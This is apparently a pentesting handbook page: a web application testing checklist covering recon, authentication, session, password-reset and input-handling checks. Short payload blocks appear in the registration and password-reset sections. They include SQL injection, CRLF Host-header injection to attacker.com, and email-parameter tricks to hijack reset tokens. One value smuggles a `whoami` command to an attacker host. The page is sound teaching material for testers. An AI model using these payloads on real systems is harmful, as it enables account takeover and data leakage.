> For the complete documentation index, see [llms.txt](https://cyb3r.gitbook.io/pentestbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cyb3r.gitbook.io/pentestbook/enumeration/web-checklist.md).

# Pentesting Web checklist

## Recon phase

* Large: a whole company with multiple domains
* Medium: a single domain
* Small: a single website

### Large scope

* [ ] Get [ASN](/pentestbook/recon/public-info-gathering.md#amass) for IP ranges ([amass](https://github.com/OWASP/Amass), [asnlookup](https://github.com/yassineaboukir/Asnlookup), [metabigor](https://github.com/j3ssie/metabigor), [bgp](https://bgp.he.net/))
* [ ] Review latest [acquisitions](https://www.crunchbase.com/)
* [ ] Get relationships by registrants ([viewdns](https://viewdns.info/reversewhois/))
* [ ] Go to medium scope for each domain

### Medium scope

* [ ] [Enumerate subdomains](/pentestbook/recon/subdomain-enum.md) ([amass](https://github.com/OWASP/Amass) or [subfinder](https://github.com/projectdiscovery/subfinder) with all available API keys)
* [ ] Subdomain bruteforce ([puredns](https://github.com/d3mondev/puredns) with [wordlist](https://gist.github.com/six2dez/a307a04a222fab5a57466c51e1569acf))
* [ ] Permute subdomains ([gotator](https://github.com/Josue87/gotator) or [ripgen](https://github.com/resyncgg/ripgen) with [wordlist](https://gist.github.com/six2dez/ffc2b14d283e8f8eff6ac83e20a3c4b4))
* [ ] Identify alive subdomains ([httpx](https://github.com/projectdiscovery/httpx))
* [ ] [Subdomain takeovers](/pentestbook/recon/subdomain-enum/subdomain-takeover.md) ([nuclei-takeovers](https://github.com/projectdiscovery/nuclei-templates/tree/master/takeovers))
* [ ] Check for [cloud assets](/pentestbook/enumeration/cloud/cloud-info-recon.md) ([cloudenum](https://github.com/initstring/cloud_enum))
* [ ] [Shodan](/pentestbook/recon/public-info-gathering.md#shodan) search
* [ ] [Transfer zone](https://six2dez.gitbook.io/pentest-book/enumeration/ports#port-53-dns)
* [ ] Subdomains recursive search
* [ ] Take screenshots ([gowitness](https://github.com/sensepost/gowitness), [webscreenshot](https://github.com/maaaaz/webscreenshot), [aquatone](https://github.com/michenriksen/aquatone))

### Small scope

* [ ] Identify web server, technologies and database ([httpx](https://github.com/projectdiscovery/httpx) , [web-check.xyz](https://web-check.xyz/))
* [ ] Try to locate `/robots.txt` , `/crossdomain.xml` `/clientaccesspolicy.xml` `/sitemap.xml` and `/.well-known/`
* [ ] Review comments on source code (Burp Engagement Tools)
* [ ] [Directory enumeration](/pentestbook/enumeration/web/crawl-fuzz.md)
* [ ] Web fuzzing ([ffuf](https://github.com/ffuf/ffuf) and [wordlist](https://github.com/six2dez/OneListForAll))
* [ ] Find[ leaked ids, emails](/pentestbook/recon/public-info-gathering.md) ([pwndb](https://github.com/davidtavarez/pwndb))
* [ ] Identify WAF ([whatwaf](https://github.com/Ekultek/WhatWaf), [wafw00f](https://github.com/EnableSecurity/wafw00f))
* [ ] [Google dorking](/pentestbook/recon/public-info-gathering.md#google)
* [ ] [GitHub dorking](/pentestbook/recon/public-info-gathering.md#github)/Github tools ([githound](https://github.com/tillson/git-hound), [gitdorks\_go](https://github.com/damit5/gitdorks_go))
* [ ] Get urls ([gau](https://github.com/lc/gau) , [waybackurls](https://github.com/tomnomnom/waybackurls), [gospider](https://github.com/jaeles-project/gospider))
* [ ] Check potential vulnerable urls ([gf-patterns](https://github.com/1ndianl33t/Gf-Patterns))
* [ ] Automatic XSS finder ([dalfox](https://github.com/hahwul/dalfox))
* [ ] Locate admin and login panel
* [ ] Broken link hijacking ([blc](https://github.com/stevenvachon/broken-link-checker))
* [ ] Get all JS files ([subjs](https://github.com/lc/subjs), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder))
* [ ] JS hardcoded APIs and secrets ([nuclei-tokens](https://github.com/projectdiscovery/nuclei-templates/tree/4e3f843e15c68f816f0ef6abce5d30b6cf6d4a30/exposures/tokens))
* [ ] JS analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder), [getjswords](https://github.com/m4ll0k/BBTz))
* [ ] Run automated scanner ([nuclei](https://github.com/projectdiscovery/nuclei))
* [ ] Test [CORS](/pentestbook/enumeration/web/cors.md) `Access-Control-Allow-Origin`

### Network

* [ ] Check ICMP packets allowed
* [ ] Check DMARC/SPF policies ([spoofcheck](https://github.com/BishopFox/spoofcheck))
* [ ] Open ports with [Shodan](https://www.shodan.io/)
* [ ] [Port scan](/pentestbook/recon/network-scanning.md#nmap) to all ports
* [ ] Check UDP ports ([udp-proto-scanner](https://github.com/CiscoCXSecurity/udp-proto-scanner) or nmap)
* [ ] Test [SSL ](/pentestbook/enumeration/ssl-tls.md)([testssl](https://github.com/drwetter/testssl.sh))
* [ ] If got creds, try password [spraying ](https://github.com/x90skysn3k/brutespray)for all the services discovered

### Preparation

* [ ] Study site structure
* [ ] Make a list with all possible test cases
* [ ] Understand the business area and what their customer needs
* [ ] Get a list of every asset `(all_subdomains.txt, live_subdomains.txt, waybackurls.txt, hidden_directories.txt, nmap_results.txt, GitHub_search.txt, altdns_subdomain.txt, vulnerable_links.txt, js_files.txt)`

## User management

### Registration

* [ ] [XSS on name or email](/pentestbook/enumeration/web/email-attacks.md)
* [ ] Duplicate registration (try with uppercase, +1\@..., dots in name, etc)
* [ ] Overwrite existing user (existing user takeover)
* [ ] Username uniqueness
* [ ] Weak password policy `(spaces, password, password=123456, 111111, abcabc, qwerty12)`
* [ ] [Insufficient email verification process](/pentestbook/enumeration/web/email-attacks.md) (also `my%00victim@mail.com` for account tko)
* [ ] If JSON request, add comma `{“email”:“victim@mail.com”,”attacker@mail.com”,“token”:”xxxxxxxxxx”}`
* [ ] Weak registration implementation or allows disposable email addresses
* [ ] Fuzz after user creation to check if any folder have been overwritten or created with your profile name
* [ ] Corrupt authentication and session defects: Sign up, don't verify, request change password, change, check if account is active.
* [ ] Try to re-register repeating same request with same password and different password too
* [ ] Lack of confirmation -> try to register with company email.
* [ ] Check OAuth with social media registration
* [ ] Check state parameter on social media registration
* [ ] Try to capture integration url leading integration takeover
* [ ] Check redirections in register page after login
* [ ] Rate limit on account creation
* [ ] Long password (>200) leads to DoS

<pre class="language-bash"><code class="lang-bash"><strong># Duplicate Registration - Check varying the email:
</strong><strong>uppsercase
</strong>victim+1@mail.com
special characters in the email name (%00, %09, %20)
Put black characters after the email: victim@mail.com a
victim@mail.com@attacker.com
victim@attacker.com@mail.com
</code></pre>

### Authentication

* [ ] [SQL Injections](/pentestbook/enumeration/web/sqli.md)
* [ ] Username enumeration
* [ ] Resilience to password guessing
* [ ] Account recovery function
* [ ] "Remember me" function
* [ ] Impersonation function
* [ ] Unsafe distribution of credentials
* [ ] Fail-open conditions
* [ ] Multi-stage mechanisms
* [ ] Auto-complete testing
* [ ] Lack of password confirmation on change email, password or 2FA (try change response)
* [ ] Weak login function over HTTP and HTTPS if both are available
* [ ] User account lockout mechanism on brute force attack
* [ ] Check for password wordlist ([cewl](https://github.com/digininja/CeWL) and [burp-goldenNuggets](https://github.com/GainSec/GoldenNuggets-1))
* [ ] Test 0auth login functionality for [Open Redirection](/pentestbook/enumeration/web/ssrf.md)
* [ ] Test response tampering in [SAML ](/pentestbook/enumeration/webservices/onelogin-saml-login.md)authentication
* [ ] In OTP check guessable codes and race conditions
* [ ] OTP, check response manipulation for bypass
* [ ] OTP, try bruteforce
* [ ] If [JWT](broken://pages/dNQvsbmKroBG4vuPTzI2), check common flaws
* [ ] Browser cache weakness (eg Pragma, Expires, Max-age)
* [ ] After register, logout, clean cache, go to home page and paste your profile url in browser, check for `login?next=accounts/profile` for open redirect or XSS with `/login?next=javascript:alert(1);//`
* [ ] Try login with common [credentials](https://github.com/ihebski/DefaultCreds-cheat-sheet)

### Session

* [ ] [Session fixation](/pentestbook/enumeration/web/session-fixation.md)
* [ ] Session handling
* [ ] Test tokens for meaning
* [ ] Test tokens for predictability
* [ ] Insecure transmission of tokens
* [ ] Disclosure of tokens in logs
* [ ] Mapping of tokens to sessions
* [ ] Session termination
* [ ] [Cross-site request forgery](/pentestbook/enumeration/web/csrf.md)
* [ ] Cookie scope
* [ ] Decode Cookie (Base64, hex, URL etc.)
* [ ] Cookie expiration time
* [ ] Check HTTPOnly and Secure flags
* [ ] Use same cookie from a different effective IP address or system
* [ ] Access controls
* [ ] Effectiveness of controls using multiple accounts
* [ ] Insecure access control methods (request parameters, Referer header, etc)
* [ ] Check for concurrent login through different machine/IP
* [ ] Path traversal on cookies
* [ ] Reuse cookie after session closed
* [ ] Logout and click browser "go back" function (Alt + Left arrow)
* [ ] 2 instances open, 1st change or reset password, refresh 2nd instance
* [ ] With privileged user perform privileged actions, try to repeat with unprivileged user cookie.
* [ ] Weak generated security questions

### Profile/Account details

* [ ] Find parameter with user id and try to tamper in order to get the details of other users
* [ ] Create a list of features that are pertaining to a user account only and try [CSRF](/pentestbook/enumeration/web/csrf.md)
* [ ] Change email id and update with any existing email id. Check if its getting validated on server or not.
* [ ] Check any new email confirmation link and what if user doesn't confirm.
* [ ] File [upload](/pentestbook/enumeration/web/upload-bypasses.md): [eicar](https://secure.eicar.org/eicar.com.txt), No Size Limit, File extension, Filter Bypass, [burp](https://github.com/portswigger/upload-scanner) extension, RCE
* [ ] Imagetragick in picture profile upload
* [ ] CSV import/export: Command Injection, XSS, macro injection
* [ ] Check profile picture URL and find email id/user info or [EXIF Geolocation Data](http://exif.regex.info/exif.cgi)
* [ ] [Metadata ](https://github.com/exiftool/exiftool)of all downloadable files (Geolocation, usernames)
* [ ] Account deletion option and try to reactivate with "Forgot password" feature
* [ ] Try bruteforce enumeration when change any user unique parameter.
* [ ] Check application request re-authentication for sensitive operations
* [ ] Try parameter pollution to add two values of same field
* [ ] Check different roles policy

### Forgot / Reset password

* [ ] Password Reset With Manipualating Email Parameter
* [ ] [Host header injection for token leakage](/pentestbook/enumeration/web/header-injections.md#headers)
* [ ] IDOR in reset link - changing Password of any User
* [ ] [HPP](/pentestbook/enumeration/web/parameter-pollution.md) in reset link or in change password/email
* [ ] Password Reset Token Leak Via Referrer
* [ ] Leaked Password Reset Token in responce/JS filesy
* [ ] [SQLi](/pentestbook/enumeration/web/sqli.md): `victim@mail.com'+(select*from(select(sleep(20)))a)+'`
* [ ] [CRLF](/pentestbook/enumeration/web/crlf.md): `/resetpassword?%0d%0aHost:%20attacker.com`
* [ ] Registre with `abc@gmail.com.attacker.com` reset password for `abc@gmáil.com.attacker.com`
* [ ] Change the request method and content-type and observer how the application is responding.&#x20;
* [ ] Append null bytes %00 after your email and observe the response.&#x20;
* [ ] Try XSS, SSTI etc in the email field.&#x20;
* [ ] Invalidate session on Logout and Password reset
* [ ] User Enumeration
* [ ] Uniqueness of forget password reset link/code
* [ ] Reset links expiration time
* [ ] Request 2 reset passwords links and use the older
* [ ] Use <username@burp_collab.net> and analyze the callback
* [ ] Check if many requests have sequential tokens
* [ ] No TLD in email parameter
* [ ] Check encryption in reset password token
* [ ] Understand how token is generated (timestamp, username, birthdate,...)
* [ ] Response manipulation: Replace Bad Response With Good One
* [ ] No Rate Limiting: Email Bombing - capture request and send over 100 times
* [ ] Long password (>200) leads to DoS

{% code lineNumbers="true" %}

```batch
email=victim@mail.com&email=attacker@mail.com
email=victim@mail.com%0a%0dcc:attacker@mail.com
email=victim@mail.com%0a%0dbcc:attacker@mail.com
email=victim@mail.com,attacker@mail.com
email=victim@mail.com%20attacker@mail.com
email=victim@mail.com|attacker@mail.com
email=victim@mail.com:attacker@mail.com
email[]=victim@mail.com&email[]=attacker@mail.com
email=victim@mail.com%0ACc:attacker@mail.com%0ABcc:attacker@mail.com
victim&email=attacker@mail.com
{"email":["victim@mail.com","attacker@mail.com"]}
{"email":"victim@mail.com","email":"attacker@mail.com"}

POST https://attacker.com/resetpassword HTTP/1.1
POST @attacker.com/resetpassword HTTP/1.1
POST :@attacker.com/resetpassword HTTP/1.1
POST /resetpassword@attacker.com HTTP/1.1

email=victim@mail.com'+(select*from(select(sleep(20)))a)+'
email=hello@`whoami`.attacker.com
/resetpassword?%0d%0aHost:%20attacker.com
```

{% endcode %}

## Input handling

* [ ] Fuzz all request parameters (if got user, add headers to fuzzer)
* [ ] Identify all reflected/Stored data, Path, file name manipulation
* [ ] [Reflected XSS](/pentestbook/enumeration/web/xss.md)
* [ ] Stored [XSS](/pentestbook/enumeration/web/xss.md) / HTML Injection
* [ ] [SQL ](/pentestbook/enumeration/web/sqli.md)injection with `'` and `'--+-`
* [ ] Identify URLs, Paths, File names manipulation
* [ ] Path [traversal](/pentestbook/enumeration/web/lfi-rfi.md), LFI and RFI
* [ ] [Open redirect](/pentestbook/enumeration/web/ssrf.md) / search for `302 or "=http" or "=aHR0"`
* [ ] [SSRF ](/pentestbook/enumeration/web/ssrf.md)in previously discovered open ports
* [ ] HTTP[ header injection](/pentestbook/enumeration/web/header-injections.md) in GET & POST (X Forwarded Host)
* [ ] RCE via Referer Header
* [ ] [SQL injection](/pentestbook/enumeration/web/sqli.md) via User-Agent Header
* [ ] OS command injection
* [ ] SMTP injection
* [ ] Native software flaws (buffer overflow, integer bugs, format strings)
* [ ] LDAP injection
* [ ] SSI Injection
* [ ] XPath injection
* [ ] [XXE](/pentestbook/enumeration/web/xxe.md) in any request, change content-type to text/xml
* [ ] [NoSQL ](/pentestbook/enumeration/webservices/nosql-and-and-mongodb.md)injection
* [ ] HTTP Request [Smuggling](/pentestbook/enumeration/web/request-smuggling.md)
* [ ] HTTP dangerous methods `OPTIONS PUT DELETE`
* [ ] Try to discover hidden parameters ([arjun ](https://github.com/s0md3v/Arjun)or [parameth](https://github.com/maK-/parameth))
* [ ] Insecure deserialization

## Error handling

* [ ] Access custom pages like `/whatever_fake.php (.aspx,.html,.etc)`
* [ ] Add multiple parameters in GET and POST request using different values
* [ ] Add `[], ]], [[, ', "` in cookie values and parameter values to create errors
* [ ] Generate error by giving input as `/~randomthing/%s` at the end of URL
* [ ] Use Burp Intruder "Fuzzing Full" List in input to generate error codes
* [ ] Try different HTTP Verbs like `PATCH, DEBUG` or wrong like `FAKE`

## Application Logic

* [ ] Identify the logic attack surface
* [ ] Test transmission of data via the client
* [ ] Test for reliance on client-side input validation
* [ ] Thick-client components (Java, ActiveX, Flash)
* [ ] Multi-stage processes for logic flaws
* [ ] Handling of incomplete input
* [ ] Trust boundaries
* [ ] Transaction logic
* [ ] Implemented CAPTCHA in email forms to avoid flooding
* [ ] Tamper product id, price or quantity value in any action (add, modify, delete, place, pay...)
* [ ] Tamper gift or discount codes
* [ ] Reuse gift codes
* [ ] Try parameter pollution to use gift code two times in same request
* [ ] Try stored XSS in non-limited fields like address
* [ ] Check in payment form if CVV and card number is in clear text or masked
* [ ] Check if is processed by the app itself or sent to 3rd parts
* [ ] IDOR from other users details ticket/cart/shipment
* [ ] Check for test credit card number allowed like `4111 1111 1111 1111` ([sample1](https://www.paypalobjects.com/en_GB/vhelp/paypalmanager_help/credit_card_numbers.htm) [sample2](http://support.worldpay.com/support/kb/bg/testandgolive/tgl5103.html))
* [ ] Check PRINT or PDF creation for IDOR
* [ ] Check unsubscribe button with user enumeration
* [ ] Parameter pollution on social media sharing links
* [ ] Change POST sensitive requests to GET

## Other checks

### Infrastructure

* [ ] Segregation in shared infrastructures
* [ ] Segregation between ASP-hosted applications
* [ ] Web server vulnerabilities
* [ ] Dangerous HTTP methods
* [ ] Proxy functionality
* [ ] [Virtual ](/pentestbook/enumeration/webservices/vhosts.md)hosting misconfiguration ([VHostScan](https://github.com/codingo/VHostScan))
* [ ] Check for internal numeric IP's in request
* [ ] Check for external numeric IP's and resolve it
* [ ] Test [cloud ](/pentestbook/enumeration/cloud/cloud-info-recon.md)storage
* [ ] Check the existence of alternative channels ([www.web.com](http://www.web.com) vs m.web.com)

### CAPTCHA

* [ ] Send old captcha value.
* [ ] Send old captcha value with old session ID.
* [ ] Request captcha absolute path like [www.url.com/captcha/1.png](http://www.url.com/captcha/1.png)
* [ ] Remove captcha with any adblocker and request again
* [ ] Bypass with OCR tool ([easy one](https://github.com/pry0cc/prys-hacks/blob/master/image-to-text))
* [ ] Change from POST to GET
* [ ] Remove captcha parameter
* [ ] Convert JSON request to normal
* [ ] Try header injections

### Security Headers

* [ ] X-XSS-Protection
* [ ] Strict-Transport-Security
* [ ] Content-Security-Policy
* [ ] Public-Key-Pins
* [ ] X-Frame-Options
* [ ] X-Content-Type-Options
* [ ] Referer-Policy
* [ ] Cache-Control
* [ ] Expires


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cyb3r.gitbook.io/pentestbook/enumeration/web-checklist.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.